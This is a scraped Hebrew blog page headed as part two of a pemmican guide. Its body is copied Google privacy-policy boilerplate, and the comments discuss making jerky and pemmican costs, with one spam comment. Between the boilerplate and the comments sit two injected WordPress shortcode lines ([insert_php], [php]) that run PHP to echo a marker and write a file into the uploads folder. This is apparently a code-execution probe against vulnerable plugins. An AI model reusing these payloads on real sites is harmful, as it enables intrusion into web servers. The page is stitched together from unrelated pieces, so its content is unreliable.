מדריך הפמיקן הגדול – חלק ב’

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

This entry was posted in מדריך and tagged , , , , . Bookmark the permalink.

9 Responses to מדריך הפמיקן הגדול – חלק ב’

  1. דני says:

    אתה לא מתבל את הבקר שאתה מייבש?

  2. Vlad says:

    לא כמו שהיית שם לג’רקי, אבל אפשר לשים ממש מעט.
    אני הוספתי לתערובת הסופית קצת פלפל ומלח.

  3. yosef says:

    ניתן להשתמש לג’רקי בלב בקר?
    ראיתי בפורומים בחול שהשתמשו בו
    הרי הוא דל מאד בשומן,וזה בס”כ שריר קשה

  4. Vlad says:

    יוסף,
    בכל המקורות שראיתי אף אחד לא השתמש באיברים פנימיים לג’רקי. הסיבה שהם עצמם יחסית שומניים, אבל יש לך נקודה טובה לגבי הלב שהוא שריר.

    חיפשתי ובאמת מצאתי כמה אנשים שעשו את זה בהצלחה. נראה לגמרי אפשרי, אנסה ואעדכן בתוצאות.

  5. אביב says:

    ולד כל הכבוד גבר. חייב להודות שרק היום קראתי את שני הפוסטים של הפמיקן – אדיר!
    אין ספק שאני מכין בקרוב, בזכותך. יש לי יותר מידי שומן בקר גראס פד ששוכב במקפיא סתם, זו תהיה הזדמנות לנצלו.
    גם אני קראתי על הפמיקן בגלל סטפן פיני והייתי מוקסם מהרעיון וההסטוריה של האינדיאנים של המישורים פה בארה”ב. ממש מרתק. לא יודע כיצד לא הכנתי פמיקן עד היום…

  6. ענת says:

    נראה לי שיש לך טעות בתוצאה. לפי הנתונים שרשמת, העלות יוצאת 100 לק”ג ולא 200.

  7. TFP says:

    ניסוי מרתק, כל הכבוד.

  8. Elva says:

    Your website can go viral, you need some initial traffic only.
    But how to get initial traffic??? Search
    in google for: Mamjo’s viral tool

Leave a Reply

Your email address will not be published. Required fields are marked *